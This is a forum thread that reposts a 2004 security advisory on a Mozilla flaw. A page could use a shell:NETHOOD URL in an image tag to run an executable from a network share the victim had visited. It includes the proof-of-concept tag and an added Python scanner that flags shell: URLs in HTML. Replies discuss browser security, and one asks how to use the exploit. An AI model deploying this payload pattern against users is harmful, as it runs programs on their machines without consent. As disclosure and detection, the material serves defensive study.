n0vun
This Advisory is Copyright © 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
"shell:NETHOOD"

AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bu...q/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.

############################################################
[START] PROOF OF CONCEPT
############################################################
<!--
MOZILLA REMOTE COMPROMISE DEMO

REPLACE "[" WITH "<", and REPLACE "]" WITH ">".

!!!!! WARNING !!!!!
THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.

PROCESS:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
"X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER.

CREATED BY:Liu Die Yu

COPYRIGHT:
This Demo is Copyright © 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
-->

[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

-----------------------
More info,
http://www.mozilla.org/security/shell.html
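
A defensive check for the pattern this advisory describes, as an added example that is not part of the original post: it scans HTML (for instance in a proxy or mail filter) for URL-bearing attributes that use the `shell:` scheme. The attribute list, function names and sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes that make a browser load or navigate to a URL (assumed list).
URL_ATTRS = {"src", "href", "background", "data", "action", "lowsrc"}
# Schemes that must never come from web content; shell: is the advisory's.
BLOCKED_SCHEMES = {"shell"}
SCHEME_RE = re.compile(r"([A-Za-z][A-Za-z0-9+.\-]*):")

def scheme_of(value):
    """Return the lowercased URI scheme of an attribute value, or None."""
    # Conservative normalisation: drop tab/CR/LF anywhere and leading
    # whitespace/control characters, so padded values are still caught.
    cleaned = re.sub(r"[\t\r\n]", "", value).lstrip("".join(map(chr, range(33))))
    match = SCHEME_RE.match(cleaned)
    return match.group(1).lower() if match else None

class ShellUrlFinder(HTMLParser):
    """Collects (line, tag, attribute, value) for blocked-scheme URLs."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases names and decodes character references in
        # attribute values, so "&#83;hell:" is seen here as "Shell:".
        for name, value in attrs:
            if value and name in URL_ATTRS and scheme_of(value) in BLOCKED_SCHEMES:
                self.hits.append((self.getpos()[0], tag, name, value))

def find_shell_urls(html_text):
    finder = ShellUrlFinder()
    finder.feed(html_text)
    finder.close()
    return finder.hits

# Constructed sample page; host, share and file names are placeholders.
SAMPLE = """<html><body>
<img src="logo.png">
<IMG SRC="shell:NETHOOD\\example share on EXAMPLE-HOST\\placeholder.exe">
<a href=" &#83;hell:NETHOOD\\x">padded and entity-encoded</a>
<a href="http://example.org/shell:not-a-scheme">ordinary link</a>
<iframe src="sh&#10;ell:NETHOOD\\x"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, tag, attr, value in find_shell_urls(SAMPLE):
        print(f"line {line}: <{tag} {attr}> -> {value!r}")
```
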


SET_coo
interesting. very interesting. another img src exploit. when will they stop?
easternerd
Not just Interesting,
But Disturbing !!!

The Bugs follow the Route and Path of Popularity!!!
Security Through Obscurity ?
pr0t0type
QUOTE (easternerd @ Jul 9 2004, 09:09 AM)
The Bugs follow the Route and Path of Popularity!!!
Security Through Obscurity ?

Yea, It'll be the real testing time for mozilla now it's getting more and more popular. Mind you, IE has set a hell of a record to beat for the number of exploits.
x1`
sorry to sound noob but does anyone have any instructions how to use this exploit , thanks if you can help and provide instructions